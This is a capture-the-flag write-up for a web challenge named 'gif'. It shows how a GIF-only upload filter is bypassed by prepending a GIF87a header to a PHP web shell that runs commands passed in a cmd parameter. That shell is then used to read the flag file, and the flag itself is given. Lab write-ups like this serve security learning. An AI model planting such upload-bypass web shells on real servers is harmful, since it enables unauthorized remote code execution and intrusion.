Info
  • Name: gif
  • Difficulty: Hard
  • Points: 272
  • Category: Web

 

 

Description

I made a secure php web app where I can upload all my gifs. Some people on the internet told me to run it in a docker container just to protect it from my personal files, but who cares.

Approach

At first, I uplaoded a Gif fie which was uploaded successfully then I attempted to upload a basic PHP payload and got this error

Untitled

from the error we can see that the files are stored at /uploads.

As the server only permitted GIF files.I modified the payload by adding a GIF header, GIF87a;.

GIF87a;
<?php
    system($_GET['cmd'])
?>

 

Untitled

 

And it worked we got remote code execution. We can now execute commands on the machine

 

Untitled

 

we can find the flag at: /uploads/payload.php/?cmd=cat /flag.txt

 

Untitled

 

 


Flag: bucket{1_h4t3_PHP}